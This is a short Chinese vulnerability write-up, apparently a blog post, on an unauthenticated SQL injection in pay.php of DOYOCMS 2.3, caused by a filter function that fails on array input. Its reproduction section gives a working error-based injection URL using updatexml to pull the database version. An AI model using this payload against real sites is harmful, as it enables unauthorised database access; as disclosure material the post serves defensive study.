在线
客服

原创推荐

DOYOCMS 2.3中pay.php无需admin用户登录sql漏洞

0人评论 31人阅读 2022-05-21 22:56:08

漏洞描述

DOYO 2.3中pay.php存在sql漏洞，无需admin用户登录.与之前的注入漏洞相比，此漏洞危害更大，因为无需登录管理账号即可触发。

影响版本

DOYO 2.3

漏洞分析

cms过滤函数语法错误，导致 pay.php中数组的过滤不生效：

漏洞复现

http://192.168.0.105/?c=pay&a=cartadd&id=1&quantity=1&attribute[]=123123' or updatexml(2,concat(0x7e,(version())),0) or'

©著作权归作者所有,如需转载，请注明出处，否则将追究法律责任

上一篇：DOYOCMS 2.3 文件上传任何类型漏洞下一篇：doyocms 2.3 存储型XSS漏洞CVE-2019-9551

猜你喜欢

doyocms 2.3 存储型XSS漏洞CVE-2019-9551 DOYOCMS 2.3 添加超级管理员账号CSRF漏洞 DOYOCMS 2.3 管理页面SQL注入漏洞 DedeCMS 5.7 SP1 /plus/download.php重定向漏洞 JunAms内容管理系统文件上传漏洞CNVD-2020-24741